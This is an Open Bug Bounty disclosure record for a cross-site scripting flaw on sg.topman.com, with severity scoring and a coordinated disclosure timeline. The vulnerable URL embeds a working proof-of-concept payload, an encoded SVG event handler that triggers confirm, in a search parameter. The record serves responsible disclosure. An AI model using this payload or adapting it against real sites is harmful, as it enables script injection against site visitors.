Lucene search
LewisWildgooseOBB:452223HistoryDec 11, 2017 - 8:49 p.m.
sg.topman.com XSS vulnerability
2017-12-1120:49:00
LewisWildgoose
www.openbugbounty.org
28
Open Bug Bounty ID: OBB-452223
| Description | Value |
|---|---|
| Affected Website: | sg.topman.com |
| Vulnerable Application: | Custom Code |
| Vulnerability Type: | XSS (Cross Site Scripting) / CWE-79 |
| CVSSv3 Score: | 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N] |
| Remediation Guide: | OWASP XSS Prevention Cheat Sheet |
Vulnerable URL:
http://sg.topman.com/webapp/wcs/stores/servlet/CatalogNavigationSearchResultCmd?langId=-1&storeId;=13083&catalogId;=35103&Dy;=1&Nty;=1&beginIndex;=1&pageNum;=1&Ntt;=%22%27--!%3E%3CSvg%3E%3CSet+End%3D0+OnEnd%3Dconfirm`openbugbounty`%3E&x;=0&y;=0
Coordinated Disclosure Timeline
| Description | Value |
|---|---|
| Vulnerability Reported: | 11 December, 2017 20:49 GMT |
| Vulnerability Verified: | 12 December, 2017 06:54 GMT |
| Website Operator Notified: | 12 December, 2017 06:54 GMT |
| Vulnerability Published: | 12 December, 2017 06:54 GMT[without any technical details] |
| Public Disclosure: | 11 March, 2018 20:49 GMT |